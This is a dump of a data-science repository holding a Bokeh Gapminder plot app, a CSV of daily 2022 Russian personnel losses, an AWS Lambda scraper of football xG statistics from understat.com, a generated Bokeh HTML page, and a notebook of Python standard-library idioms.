 65 |               x_range=(xmin, xmax),
 66 |               y_range=(ymin, ymax), y_axis_type='log')
 67 | 
 68 | # Add circle glyphs to the plot
 69 | plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region',
 70 |             color=dict(field='region', transform=color_mapper),
 71 |             size=7)
 72 | 
 73 | # Set the legend.location attribute of the plot
 74 | plot.legend.location = 'bottom_right'
 75 | 
 76 | # Set the x-axis label
 77 | plot.xaxis.axis_label = 'Income per person (Gross domestic product per person adjusted for differences in ' \
 78 |                         'purchasing power in international dollars, fixed 2011 prices, PPP based on 2011 ICP)'
 79 | 
 80 | # Set the y-axis label
 81 | plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)'
 82 | 
 83 | # Make a slider object: slider
 84 | slider = Slider(start=min(final_df.year), end=max(final_df.year), step=1, value=min(final_df.year), title='Year')
 85 | 
 86 | 
 87 | def update_plot(attr, old, new):
 88 |     # set the `yr` name to `slider.value` and `source.data = new_data`
 89 |     yr = slider.value
 90 | 
 91 |     new_data = {
 92 |         'x': final_df.gdp[final_df['year'] == yr],
 93 |         'y': final_df.co2[final_df['year'] == yr],
 94 |         'country': final_df.country[final_df['year'] == yr],
 95 |         'region': final_df.region[final_df['year'] == yr],
 96 |     }
 97 |     source.data = new_data
 98 | 
 99 |     # Add title to figure: plot.title.text
100 |     plot.title.text = 'Gapminder data for %d' % yr
101 | 
102 | 
103 | # Attach the callback to the 'value' property of slider
104 | slider.on_change('value', update_plot)
105 | 
106 | # Create a HoverTool: hover
107 | hover = HoverTool(tooltips=[('Country', '@country'), ('GDP', '@x'), ('CO2 emission', '@y')])
108 | 
109 | # Add the HoverTool to the plot
110 | plot.add_tools(hover)
111 | 
112 | # Make a row layout of widgetbox(slider) and plot and add it to the current document
113 | layout = row(widgetbox(slider), plot)
114 | curdoc().add_root(layout)
115 | 
116 | 
117 | 


--------------------------------------------------------------------------------
/data/dead_rusnia.csv:
--------------------------------------------------------------------------------
  1 | date,Personnel
  2 | 01/03/2022,410
  3 | 02/03/2022,130
  4 | 03/03/2022,760
  5 | 04/03/2022,150
  6 | 05/03/2022,850
  7 | 06/03/2022,1000
  8 | 07/03/2022,600
  9 | 08/03/2022,400
 10 | 09/03/2022,500
 11 | 10/03/2022,500
 12 | 11/03/2022,500
 13 | 12/03/2022,300
 14 | 13/03/2022,100
 15 | 14/03/2022,200
 16 | 15/03/2022,1200
 17 | 16/03/2022,300
 18 | 17/03/2022,200
 19 | 18/03/2022,200
 20 | 19/03/2022,200
 21 | 20/03/2022,300
 22 | 21/03/2022,300
 23 | 22/03/2022,300
 24 | 23/03/2022,300
 25 | 24/03/2022,200
 26 | 25/03/2022,300
 27 | 26/03/2022,300
 28 | 27/03/2022,500
 29 | 28/03/2022,400
 30 | 29/03/2022,200
 31 | 30/03/2022,100
 32 | 31/03/2022,200
 33 | 01/04/2022,200
 34 | 02/04/2022,100
 35 | 03/04/2022,200
 36 | 04/04/2022,300
 37 | 05/04/2022,200
 38 | 06/04/2022,100
 39 | 07/04/2022,300
 40 | 08/04/2022,100
 41 | 09/04/2022,100
 42 | 10/04/2022,200
 43 | 11/04/2022,200
 44 | 12/04/2022,100
 45 | 13/04/2022,200
 46 | 14/04/2022,100
 47 | 15/04/2022,100
 48 | 16/04/2022,100
 49 | 17/04/2022,200
 50 | 18/04/2022,300
 51 | 19/04/2022,200
 52 | 20/04/2022,100
 53 | 21/04/2022,100
 54 | 22/04/2022,200
 55 | 23/04/2022,400
 56 | 24/04/2022,200
 57 | 25/04/2022,100
 58 | 26/04/2022,200
 59 | 27/04/2022,300
 60 | 28/04/2022,400
 61 | 29/04/2022,200
 62 | 30/04/2022,200
 63 | 01/05/2022,300
 64 | 02/05/2022,300
 65 | 03/05/2022,400
 66 | 04/05/2022,300
 67 | 05/05/2022,200
 68 | 06/05/2022,200
 69 | 07/05/2022,200
 70 | 08/05/2022,400
 71 | 09/05/2022,150
 72 | 10/05/2022,350
 73 | 11/05/2022,350
 74 | 12/05/2022,300
 75 | 13/05/2022,250
 76 | 14/05/2022,300
 77 | 15/05/2022,200
 78 | 16/05/2022,300
 79 | 17/05/2022,200
 80 | 18/05/2022,400
 81 | 19/05/2022,200
 82 | 20/05/2022,200
 83 | 21/05/2022,150
 84 | 22/05/2022,200
 85 | 23/05/2022,150
 86 | 24/05/2022,150
 87 | 25/05/2022,100
 88 | 26/05/2022,150
 89 | 27/05/2022,150
 90 | 28/05/2022,250
 91 | 29/05/2022,150
 92 | 30/05/2022,200
 93 | 31/05/2022,150
 94 | 01/06/2022,200
 95 | 02/06/2022,150
 96 | 03/06/2022,100
 97 | 04/06/2022,100
 98 | 05/06/2022,100
 99 | 06/06/2022,100
100 | 07/06/2022,110
101 | 08/06/2022,140
102 | 09/06/2022,200
103 | 10/06/2022,200
104 | 11/06/2022,150
105 | 12/06/2022,100
106 | 13/06/2022,150
107 | 14/06/2022,200
108 | 15/06/2022,250
109 | 16/06/2022,200
110 | 17/06/2022,200
111 | 18/06/2022,200
112 | 19/06/2022,250
113 | 20/06/2022,200
114 | 21/06/2022,300
115 | 22/06/2022,130
116 | 23/06/2022,200
117 | 24/06/2022,100
118 | 25/06/2022,170
119 | 26/06/2022,150
120 | 27/06/2022,150
121 | 28/06/2022,250
122 | 29/06/2022,200
123 | 30/06/2022,150
124 | 01/07/2022,150
125 | 02/07/2022,120
126 | 03/07/2022,100
127 | 04/07/2022,230
128 | 05/07/2022,150
129 | 06/07/2022,150
130 | 07/07/2022,150
131 | 08/07/2022,250
132 | 09/07/2022,300
133 | 10/07/2022,100
134 | 11/07/2022,100
135 | 12/07/2022,70
136 | 13/07/2022,100
137 | 14/07/2022,300
138 | 15/07/2022,130
139 | 16/07/2022,140
140 | 17/07/2022,160
141 | 18/07/2022,150
142 | 19/07/2022,100
143 | 20/07/2022,200
144 | 21/07/2022,100
145 | 22/07/2022,150
146 | 23/07/2022,240
147 | 24/07/2022,280
148 | 25/07/2022,180
149 | 26/07/2022,170
150 | 27/07/2022,200
151 | 28/07/2022,160
152 | 29/07/2022,270
153 | 30/07/2022,170
154 | 31/07/2022,160
155 | 01/08/2022,200
156 | 02/08/2022,140
157 | 03/08/2022,180
158 | 04/08/2022,150
159 | 05/08/2022,150
160 | 06/08/2022,250
161 | 07/08/2022,300
162 | 08/08/2022,140
163 | 09/08/2022,300
164 | 10/08/2022,160
165 | 11/08/2022,200
166 | 12/08/2022,200
167 | 13/08/2022,200
168 | 14/08/2022,150
169 | 15/08/2022,200
170 | 16/08/2022,150
171 | 17/08/2022,200
172 | 18/08/2022,200
173 | 19/08/2022,400
174 | 20/08/2022,200
175 | 21/08/2022,300
176 | 22/08/2022,200
177 | 23/08/2022,150
178 | 24/08/2022,150
179 | 25/08/2022,150
180 | 26/08/2022,400
181 | 27/08/2022,250
182 | 28/08/2022,250
183 | 29/08/2022,350
184 | 30/08/2022,450
185 | 31/08/2022,350
186 | 01/09/2022,450
187 | 02/09/2022,350
188 | 03/09/2022,350
189 | 04/09/2022,450
190 | 05/09/2022,300
191 | 06/09/2022,350
192 | 07/09/2022,460
193 | 08/09/2022,640
194 | 09/09/2022,650
195 | 10/09/2022,350
196 | 11/09/2022,400
197 | 12/09/2022,300
198 | 13/09/2022,350
199 | 14/09/2022,350
200 | 15/09/2022,200
201 | 16/09/2022,200
202 | 17/09/2022,200
203 | 18/09/2022,230
204 | 19/09/2022,170
205 | 20/09/2022,160
206 | 21/09/2022,300
207 | 22/09/2022,400
208 | 23/09/2022,550
209 | 24/09/2022,240
210 | 25/09/2022,400
211 | 26/09/2022,500
212 | 27/09/2022,550
213 | 28/09/2022,400
214 | 29/09/2022,430
215 | 30/09/2022,500
216 | 01/10/2022,530
217 | 02/10/2022,500
218 | 03/10/2022,320
219 | 04/10/2022,370
220 | 05/10/2022,200
221 | 06/10/2022,330
222 | 07/10/2022,350
223 | 08/10/2022,380
224 | 09/10/2022,440
225 | 10/10/2022,370
226 | 11/10/2022,240
227 | 12/10/2022,270
228 | 13/10/2022,420
229 | 14/10/2022,500
230 | 15/10/2022,400
231 | 16/10/2022,300
232 | 17/10/2022,320
233 | 18/10/2022,530
234 | 19/10/2022,430
235 | 20/10/2022,370
236 | 21/10/2022,100
237 | 22/10/2022,320
238 | 23/10/2022,400
239 | 24/10/2022,470
240 | 25/10/2022,480
241 | 26/10/2022,480
242 | 27/10/2022,320
243 | 28/10/2022,480
244 | 29/10/2022,550
245 | 30/10/2022,950
246 | 31/10/2022,620
247 | 01/11/2022,650
248 | 02/11/2022,800
249 | 03/11/2022,730
250 | 04/11/2022,840
251 | 05/11/2022,600
252 | 06/11/2022,490


--------------------------------------------------------------------------------
/lambda_web_scraper.py:
--------------------------------------------------------------------------------
  1 | import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
  2 | import requests
  3 | from bs4 import BeautifulSoup
  4 | import json
  5 | import boto3
  6 | import logging
  7 | 
  8 | logger = logging.getLogger()
  9 | logger.setLevel(logging.INFO)
 10 | 
 11 | # create urls for all SEASONS of all LEAGUES
 12 | BASE_URL = 'https://understat.com/league'
 13 | LEAGUES = ['La_liga', 'EPL', 'Bundesliga', 'Serie_A', 'Ligue_1']
 14 | SEASONS = ['2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']
 15 | # SEASONS = ['2021']
 16 | 
 17 | 
 18 | def get_teams_data(data):
 19 |     # Get teams and their relevant ids and put them into separate dictionary
 20 |     teams = {}
 21 |     for id in data.keys():
 22 |         teams[id] = data[id]['title']
 23 |     
 24 |     # EDA to get a feeling of how the JSON is structured
 25 |     # Column names are all the same, so we just use first element
 26 |     columns = []
 27 |     # Check the sample of values per each column
 28 |     values = []
 29 |     for id in data.keys():
 30 |         columns = list(data[id]['history'][0].keys())
 31 |         values = list(data[id]['history'][0].values())
 32 |         break
 33 |     
 34 |     # Getting data for all teams
 35 |     dataframes = {}
 36 |     for id, team in teams.items():
 37 |         teams_data = []
 38 |         for row in data[id]['history']:
 39 |             teams_data.append(list(row.values()))
 40 | 
 41 |         df = pd.DataFrame(teams_data, columns=columns)
 42 |         dataframes[team] = df
 43 |         # print('Added data for {}.'.format(team))
 44 | 
 45 |     return dataframes
 46 | 
 47 | 
 48 | def get_data_from_web(league, season):
 49 |     url = BASE_URL+'/'+league+'/'+season
 50 |     logger.info("Scraping " + url)
 51 |     res = requests.get(url)
 52 |     soup = BeautifulSoup(res.content, "lxml")
 53 | 
 54 |     # Based on the structure of the webpage, I found that data is in the JSON variable, under <script> tags
 55 |     scripts = soup.find_all('script')
 56 |     
 57 |     string_with_json_obj = ''
 58 | 
 59 |     # Find data for teams
 60 |     for el in scripts:
 61 |         if 'teamsData' in str(el):
 62 |             string_with_json_obj = str(el).strip()
 63 | 
 64 |     # print(string_with_json_obj)
 65 | 
 66 |     # strip unnecessary symbols and get only JSON data
 67 |     ind_start = string_with_json_obj.index("('")+2
 68 |     ind_end = string_with_json_obj.index("')")
 69 |     json_data = string_with_json_obj[ind_start:ind_end]
 70 |     json_data = json_data.encode('utf8').decode('unicode_escape')
 71 |     
 72 |     # convert JSON data into Python dictionary
 73 |     data = json.loads(json_data)
 74 | 
 75 |     return data
 76 | 
 77 | def calculate_custom_parameters(dataframes):
 78 |     for team, df in dataframes.items():
 79 |         dataframes[team]['ppda_coef'] = dataframes[team]['ppda'].apply(lambda x: x['att']/x['def'] if x['def'] != 0 else 0)
 80 |         dataframes[team]['oppda_coef'] = dataframes[team]['ppda_allowed'].apply(lambda x: x['att']/x['def'] if x['def'] != 0 else 0)
 81 |         dataframes[team]['xG_h'] = dataframes[team].apply(lambda x: x['xG'] if x['h_a'] == 'h' else 0.0, axis=1)
 82 |         dataframes[team]['xG_a'] = dataframes[team].apply(lambda x: x['xG'] if x['h_a'] == 'a' else 0.0, axis=1)
 83 |         dataframes[team]['xGA_h'] = dataframes[team].apply(lambda x: x['xGA'] if x['h_a'] == 'h' else 0.0, axis=1)
 84 |         dataframes[team]['xGA_a'] = dataframes[team].apply(lambda x: x['xGA'] if x['h_a'] == 'a' else 0.0, axis=1)
 85 |         dataframes[team]['matches_h'] = dataframes[team].apply(lambda x: 1 if x['h_a'] == 'h' else 0.0, axis=1)
 86 |         dataframes[team]['matches_a'] = dataframes[team].apply(lambda x: 1 if x['h_a'] == 'a' else 0.0, axis=1)
 87 | 
 88 |     return dataframes
 89 | 
 90 | 
 91 | def regroup_data(dataframes):
 92 |     cols_to_sum = ['xG', 'xG_h', 'xG_a', 'xGA', 'xGA_h', 'xGA_a', 'npxG', 'npxGA', 'deep', 'deep_allowed', 'scored', 'missed', 'xpts', 'wins', 'draws', 'loses', 'pts', 'npxGD', 'matches_h', 'matches_a']
 93 |     cols_to_mean = ['ppda_coef', 'oppda_coef']
 94 |     
 95 |     frames = []
 96 |     for team, df in dataframes.items():
 97 |         sum_data = pd.DataFrame(df[cols_to_sum].sum()).transpose()
 98 |         mean_data = pd.DataFrame(df[cols_to_mean].mean()).transpose()
 99 |         final_df = sum_data.join(mean_data)
100 |         final_df['team'] = team
101 |         final_df['matches'] = len(df)
102 |         frames.append(final_df)
103 | 
104 |     full_stat = pd.concat(frames)
105 | 
106 |     return full_stat
107 | 
108 | 
109 | def adjustments_for_final_table_look(full_stat):
110 |     full_stat = full_stat[['team', 'matches', 'wins', 'draws', 'loses', 'scored', 'missed', 'pts', 'xG', 'xG_h', 'xG_a', 'xGA', 'xGA_h', 'xGA_a', 'npxG', 'npxGA', 'npxGD', 'ppda_coef', 'oppda_coef', 'deep', 'deep_allowed', 'xpts', 'matches_h', 'matches_a']]
111 |     full_stat.sort_values('pts', ascending=False, inplace=True)
112 |     full_stat.reset_index(inplace=True, drop=True)
113 |     full_stat['position'] = range(1,len(full_stat)+1)
114 |     
115 |     full_stat['xG_diff'] = full_stat['xG'] - full_stat['scored']
116 |     full_stat['xGA_diff'] = full_stat['xGA'] - full_stat['missed']
117 |     full_stat['xpts_diff'] = full_stat['xpts'] - full_stat['pts']
118 |     
119 |     cols_to_int = ['wins', 'draws', 'loses', 'scored', 'missed', 'pts', 'deep', 'deep_allowed']
120 |     full_stat[cols_to_int] = full_stat[cols_to_int].astype(int)
121 |     
122 |     col_order = ['position', 'team', 'matches', 'wins', 'draws', 'loses', 'scored', 'missed', 'pts', 'xG', 'xG_diff', 'npxG', 'xGA', 'xGA_diff', 'npxGA', 'npxGD', 'ppda_coef', 'oppda_coef', 'deep', 'deep_allowed', 'xpts', 'xpts_diff', 'xG_h', 'xG_a', 'xGA_h', 'xGA_a', 'matches_h', 'matches_a']
123 |     full_stat = full_stat[col_order]
124 |     full_stat = full_stat.set_index('position')
125 |     # print(full_stat.head(20))
126 | 
127 |     return full_stat
128 | 
129 | 
130 | def lambda_handler(event, context):
131 |     logger.info('Getting teams data...')
132 | 
133 |     full_data = dict()
134 |     for league in LEAGUES:
135 |     
136 |         season_data = dict()
137 |         for season in SEASONS:
138 |             data = get_data_from_web(league, season)
139 | 
140 |             dataframes = get_teams_data(data)
141 | 
142 |             dataframes = calculate_custom_parameters(dataframes)
143 | 
144 |             full_stat = regroup_data(dataframes)
145 |             
146 |             season_data[season] = adjustments_for_final_table_look(full_stat)
147 |     
148 |         df_season = pd.concat(season_data)
149 |         full_data[league] = df_season
150 |         
151 |     data = pd.concat(full_data)
152 |     cols_norm = data.select_dtypes(include=[object]).columns
153 |     data[cols_norm] = data[cols_norm].apply(lambda x: x.str.normalize('NFKD').str.encode('ascii', errors='ignore').str.decode('utf-8'))
154 | 
155 |     # data.to_csv('understat_teams.csv')
156 | 
157 |     # s3_client = boto3.client('s3')
158 |     # response = s3_client.upload_file('understat_teams.csv', 'xg-live-data', 'data/understat_teams_from_local.csv')
159 | 
160 |     data.to_csv('s3://xg-live-data/data/understat_teams.csv')
161 |     
162 |     return "Got the latest data"
163 | 


--------------------------------------------------------------------------------
/circle.html:
--------------------------------------------------------------------------------
 1 | 
 2 | <!DOCTYPE html>
 3 | <html lang="en">
 4 |     <head>
 5 |         <meta charset="utf-8">
 6 |         <title>Bokeh Plot</title>
 7 |         
 8 | <link rel="stylesheet" href="https://cdn.pydata.org/bokeh/release/bokeh-0.12.16.min.css" type="text/css" />
 9 |         
10 | <script type="text/javascript" src="https://cdn.pydata.org/bokeh/release/bokeh-0.12.16.min.js"></script>
11 | <script type="text/javascript">
12 |     Bokeh.set_log_level("info");
13 | </script>
14 |     </head>
15 |     <body>
16 |         
17 |         <div class="bk-root">
18 |             <div class="bk-plotdiv" id="e1715a22-c5c4-4670-86fb-003baa7d29f6"></div>
19 |         </div>
20 |         
21 |         <script type="application/json" id="f35ab70f-ba65-4ae4-ad47-af7f5c12ad69">
22 |           {"c11c89b6-f608-460f-a1f4-bf68f82ce39e":{"roots":{"references":[{"attributes":{},"id":"aad8fff0-a933-4990-bd1c-a27ebb2b0ac9","type":"LinearScale"},{"attributes":{"active_drag":"auto","active_inspect":"auto","active_scroll":"auto","active_tap":"auto","tools":[{"id":"4b4e05c8-ace7-495f-a8d7-2bfc2b7ae8a4","type":"PanTool"},{"id":"8c524077-9b6e-401f-9827-74606c1c9f5d","type":"BoxZoomTool"}]},"id":"d3181a84-02ac-4a63-8f93-424bbdb923a5","type":"Toolbar"},{"attributes":{"source":{"id":"7237a0f8-2989-4b02-b8a8-b56ae6c12e4f","type":"ColumnDataSource"}},"id":"5d0f343a-1a46-4fff-b325-5e5d6a3d99eb","type":"CDSView"},{"attributes":{"fill_color":{"value":"#1f77b4"},"line_color":{"value":"#1f77b4"},"x":{"field":"x"},"y":{"field":"y"}},"id":"e73583d3-3b95-4d65-9795-f9374388a2f3","type":"Circle"},{"attributes":{},"id":"e2fec60b-f5e1-41a3-974a-5138e9a8058c","type":"BasicTickFormatter"},{"attributes":{"callback":null,"data":{"x":[1,2,3,4,5],"y":[8,6,5,2,3]},"selected":{"id":"8ca6b346-f5a1-4782-bc43-b604b72190f5","type":"Selection"},"selection_policy":{"id":"ea4ee9e9-2f25-463f-a939-cae7b3ee5ddb","type":"UnionRenderers"}},"id":"7237a0f8-2989-4b02-b8a8-b56ae6c12e4f","type":"ColumnDataSource"},{"attributes":{"below":[{"id":"26a4a4cd-9482-419c-a549-2f9d3e866509","type":"LinearAxis"}],"left":[{"id":"0d428697-e6c0-4458-bbee-33b18bfe83bf","type":"LinearAxis"}],"plot_width":400,"renderers":[{"id":"26a4a4cd-9482-419c-a549-2f9d3e866509","type":"LinearAxis"},{"id":"a2ce5ee9-36b7-4309-883e-636267c2a500","type":"Grid"},{"id":"0d428697-e6c0-4458-bbee-33b18bfe83bf","type":"LinearAxis"},{"id":"03b86b67-ebe7-479b-8506-2770204b27d6","type":"Grid"},{"id":"dd09c004-34b3-44ba-825e-36c06f50b3e2","type":"BoxAnnotation"},{"id":"7b621e24-ea8e-456c-ac85-4d509abf220a","type":"GlyphRenderer"}],"title":{"id":"f251efbb-ed4f-4c9b-a188-5acb9c87e283","type":"Title"},"toolbar":{"id":"d3181a84-02ac-4a63-8f93-424bbdb923a5","type":"Toolbar"},"x_range":{"id":"48158f75-7370-4010-87f9-0d7e34adf09a","type":"DataRange1d"},"x_scale":{"id":"1b638b9f-3e5d-45c7-ab1b-c2fb7234600e","type":"LinearScale"},"y_range":{"id":"387b06fb-5257-4839-b648-2d19f70e2707","type":"DataRange1d"},"y_scale":{"id":"aad8fff0-a933-4990-bd1c-a27ebb2b0ac9","type":"LinearScale"}},"id":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d","subtype":"Figure","type":"Plot"},{"attributes":{"bottom_units":"screen","fill_alpha":{"value":0.5},"fill_color":{"value":"lightgrey"},"left_units":"screen","level":"overlay","line_alpha":{"value":1.0},"line_color":{"value":"black"},"line_dash":[4,4],"line_width":{"value":2},"plot":null,"render_mode":"css","right_units":"screen","top_units":"screen"},"id":"dd09c004-34b3-44ba-825e-36c06f50b3e2","type":"BoxAnnotation"},{"attributes":{},"id":"c22b44d3-d603-4aa7-90ef-7fdfac82c7e0","type":"BasicTicker"},{"attributes":{"callback":null},"id":"48158f75-7370-4010-87f9-0d7e34adf09a","type":"DataRange1d"},{"attributes":{"plot":null,"text":""},"id":"f251efbb-ed4f-4c9b-a188-5acb9c87e283","type":"Title"},{"attributes":{"formatter":{"id":"e2fec60b-f5e1-41a3-974a-5138e9a8058c","type":"BasicTickFormatter"},"plot":{"id":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d","subtype":"Figure","type":"Plot"},"ticker":{"id":"680238f0-ff38-4c55-95f8-d9f0f44fbf30","type":"BasicTicker"}},"id":"26a4a4cd-9482-419c-a549-2f9d3e866509","type":"LinearAxis"},{"attributes":{"fill_alpha":{"value":0.1},"fill_color":{"value":"#1f77b4"},"line_alpha":{"value":0.1},"line_color":{"value":"#1f77b4"},"x":{"field":"x"},"y":{"field":"y"}},"id":"11ea467e-a5d3-4a0b-86b6-84c4233f73f5","type":"Circle"},{"attributes":{},"id":"8ca6b346-f5a1-4782-bc43-b604b72190f5","type":"Selection"},{"attributes":{},"id":"680238f0-ff38-4c55-95f8-d9f0f44fbf30","type":"BasicTicker"},{"attributes":{},"id":"ea4ee9e9-2f25-463f-a939-cae7b3ee5ddb","type":"UnionRenderers"},{"attributes":{"plot":{"id":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d","subtype":"Figure","type":"Plot"},"ticker":{"id":"680238f0-ff38-4c55-95f8-d9f0f44fbf30","type":"BasicTicker"}},"id":"a2ce5ee9-36b7-4309-883e-636267c2a500","type":"Grid"},{"attributes":{"formatter":{"id":"efe372a9-8451-4ff0-a370-90b7de1805c4","type":"BasicTickFormatter"},"plot":{"id":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d","subtype":"Figure","type":"Plot"},"ticker":{"id":"c22b44d3-d603-4aa7-90ef-7fdfac82c7e0","type":"BasicTicker"}},"id":"0d428697-e6c0-4458-bbee-33b18bfe83bf","type":"LinearAxis"},{"attributes":{},"id":"efe372a9-8451-4ff0-a370-90b7de1805c4","type":"BasicTickFormatter"},{"attributes":{"dimension":1,"plot":{"id":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d","subtype":"Figure","type":"Plot"},"ticker":{"id":"c22b44d3-d603-4aa7-90ef-7fdfac82c7e0","type":"BasicTicker"}},"id":"03b86b67-ebe7-479b-8506-2770204b27d6","type":"Grid"},{"attributes":{"overlay":{"id":"dd09c004-34b3-44ba-825e-36c06f50b3e2","type":"BoxAnnotation"}},"id":"8c524077-9b6e-401f-9827-74606c1c9f5d","type":"BoxZoomTool"},{"attributes":{},"id":"1b638b9f-3e5d-45c7-ab1b-c2fb7234600e","type":"LinearScale"},{"attributes":{},"id":"4b4e05c8-ace7-495f-a8d7-2bfc2b7ae8a4","type":"PanTool"},{"attributes":{"data_source":{"id":"7237a0f8-2989-4b02-b8a8-b56ae6c12e4f","type":"ColumnDataSource"},"glyph":{"id":"e73583d3-3b95-4d65-9795-f9374388a2f3","type":"Circle"},"hover_glyph":null,"muted_glyph":null,"nonselection_glyph":{"id":"11ea467e-a5d3-4a0b-86b6-84c4233f73f5","type":"Circle"},"selection_glyph":null,"view":{"id":"5d0f343a-1a46-4fff-b325-5e5d6a3d99eb","type":"CDSView"}},"id":"7b621e24-ea8e-456c-ac85-4d509abf220a","type":"GlyphRenderer"},{"attributes":{"callback":null},"id":"387b06fb-5257-4839-b648-2d19f70e2707","type":"DataRange1d"}],"root_ids":["b57a90ed-e5f8-47d4-85d3-5109866fbc4d"]},"title":"Bokeh Application","version":"0.12.16"}}
23 |         </script>
24 |         <script type="text/javascript">
25 |           (function() {
26 |             var fn = function() {
27 |               Bokeh.safely(function() {
28 |                 (function(root) {
29 |                   function embed_document(root) {
30 |                     
31 |                   var docs_json = document.getElementById('f35ab70f-ba65-4ae4-ad47-af7f5c12ad69').textContent;
32 |                   var render_items = [{"docid":"c11c89b6-f608-460f-a1f4-bf68f82ce39e","elementid":"e1715a22-c5c4-4670-86fb-003baa7d29f6","modelid":"b57a90ed-e5f8-47d4-85d3-5109866fbc4d"}];
33 |                   root.Bokeh.embed.embed_items(docs_json, render_items);
34 |                 
35 |                   }
36 |                   if (root.Bokeh !== undefined) {
37 |                     embed_document(root);
38 |                   } else {
39 |                     var attempts = 0;
40 |                     var timer = setInterval(function(root) {
41 |                       if (root.Bokeh !== undefined) {
42 |                         embed_document(root);
43 |                         clearInterval(timer);
44 |                       }
45 |                       attempts++;
46 |                       if (attempts > 100) {
47 |                         console.log("Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing")
48 |                         clearInterval(timer);
49 |                       }
50 |                     }, 10, root)
51 |                   }
52 |                 })(window);
53 |               });
54 |             };
55 |             if (document.readyState != "loading") fn();
56 |             else document.addEventListener("DOMContentLoaded", fn);
57 |           })();
58 |         </script>
59 |     </body>
60 | </html>


--------------------------------------------------------------------------------
/data_manipulation_with_standard_lib.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "code",
  5 |    "execution_count": 1,
  6 |    "metadata": {},
  7 |    "outputs": [],
  8 |    "source": [
  9 |     "PATH_TO_FILE = 'data/cart.csv'"
 10 |    ]
 11 |   },
 12 |   {
 13 |    "cell_type": "code",
 14 |    "execution_count": null,
 15 |    "metadata": {},
 16 |    "outputs": [],
 17 |    "source": [
 18 |     "def do_something_with():\n",
 19 |     "    pass\n",
 20 |     "\n",
 21 |     "l = ['Twitter', 'Instagram', 'Snapchat', 'TikTok']\n",
 22 |     "# Instead of\n",
 23 |     "i = 0\n",
 24 |     "for s in l:\n",
 25 |     "    do_something_with(i, s)\n",
 26 |     "    i += 1\n",
 27 |     "\n",
 28 |     "# Use\n",
 29 |     "for i, s in enumerate(l):\n",
 30 |     "    do_something_with(i, s)\n",
 31 |     "\n",
 32 |     "# less verbose and even slightly faster"
 33 |    ]
 34 |   },
 35 |   {
 36 |    "cell_type": "code",
 37 |    "execution_count": 8,
 38 |    "metadata": {},
 39 |    "outputs": [
 40 |     {
 41 |      "name": "stdout",
 42 |      "output_type": "stream",
 43 |      "text": [
 44 |       "1 ['t-shirt', 'black', 'top', '20', '1']\n",
 45 |       "2 ['pants', 'white', 'bottom', '50', '1']\n",
 46 |       "3 ['blazer', 'yellow', 'top', '100', '1']\n",
 47 |       "4 ['t-shirt', 'red', 'top', '15', '2']\n",
 48 |       "5 ['t-shirt', 'orange', 'top', '25', '1']\n",
 49 |       "6 ['sneakers', 'white', 'footwear', '100', '1']\n",
 50 |       "7 ['bracelet', 'green', 'accesories', '5', '3']\n"
 51 |      ]
 52 |     }
 53 |    ],
 54 |    "source": [
 55 |     "import csv\n",
 56 |     "\n",
 57 |     "with open(PATH_TO_FILE, 'r') as f:\n",
 58 |     "    rows = csv.reader(f, delimiter=',', quotechar='\"', escapechar=\"\\\\\")\n",
 59 |     "    headers = next(rows)\n",
 60 |     "    for line, row in enumerate(rows, start=1):\n",
 61 |     "        print(line, row)"
 62 |    ]
 63 |   },
 64 |   {
 65 |    "cell_type": "code",
 66 |    "execution_count": 6,
 67 |    "metadata": {},
 68 |    "outputs": [
 69 |     {
 70 |      "data": {
 71 |       "text/plain": [
 72 |        "55"
 73 |       ]
 74 |      },
 75 |      "execution_count": 6,
 76 |      "metadata": {},
 77 |      "output_type": "execute_result"
 78 |     }
 79 |    ],
 80 |    "source": [
 81 |     "shopping_cart = [\n",
 82 |     "    ('t-shirt', 15, 1),\n",
 83 |     "    ('pants', 50, 1),\n",
 84 |     "    ('t-shirt', 20, 2),\n",
 85 |     "    ('socks', 10, 1),\n",
 86 |     "    ('jacket', 100, 1),\n",
 87 |     "    ('socks', 5, 1)\n",
 88 |     "]\n",
 89 |     "\n",
 90 |     "from collections import Counter\n",
 91 |     "total_clothes = Counter()\n",
 92 |     "for item, price, quantity in shopping_cart:\n",
 93 |     "    total_clothes[item] += price*quantity\n",
 94 |     "\n",
 95 |     "total_clothes['t-shirt']\n",
 96 |     "# >>> 55\n",
 97 |     "\n",
 98 |     "# This won't work\n",
 99 |     "total_clothes = {}\n",
100 |     "for item, price, quantity in shopping_cart:\n",
101 |     "    total_clothes[item] += price*quantity\n",
102 |     "\n",
103 |     "total_clothes['t-shirt']\n",
104 |     "# >>> KeyError: 't-shirt'\n",
105 |     "\n",
106 |     "# In order to make it work with dictionary:\n",
107 |     "total_clothes = {}\n",
108 |     "for item, price, quantity in shopping_cart:\n",
109 |     "    if item in total_clothes.keys():\n",
110 |     "        total_clothes[item] += price*quantity\n",
111 |     "    else:\n",
112 |     "        total_clothes[item] = price*quantity\n",
113 |     "\n",
114 |     "total_clothes['t-shirt']\n",
115 |     "# >>> 55"
116 |    ]
117 |   },
118 |   {
119 |    "cell_type": "code",
120 |    "execution_count": 20,
121 |    "metadata": {},
122 |    "outputs": [
123 |     {
124 |      "data": {
125 |       "text/plain": [
126 |        "Counter({'t-shirt': 55, 'pants': 50, 'socks': 15, 'jacket': 100})"
127 |       ]
128 |      },
129 |      "execution_count": 20,
130 |      "metadata": {},
131 |      "output_type": "execute_result"
132 |     }
133 |    ],
134 |    "source": [
135 |     "shopping_cart = [\n",
136 |     "    ('t-shirt', 15, 1),\n",
137 |     "    ('pants', 50, 1),\n",
138 |     "    ('t-shirt', 20, 2),\n",
139 |     "    ('socks', 10, 1),\n",
140 |     "    ('jacket', 100, 1),\n",
141 |     "    ('socks', 5, 1)\n",
142 |     "]\n",
143 |     "\n",
144 |     "from collections import Counter\n",
145 |     "total_clothes = Counter()\n",
146 |     "for item, price, quantity in shopping_cart:\n",
147 |     "    total_clothes[item] += price*quantity\n",
148 |     "\n",
149 |     "total_clothes"
150 |    ]
151 |   },
152 |   {
153 |    "cell_type": "code",
154 |    "execution_count": 4,
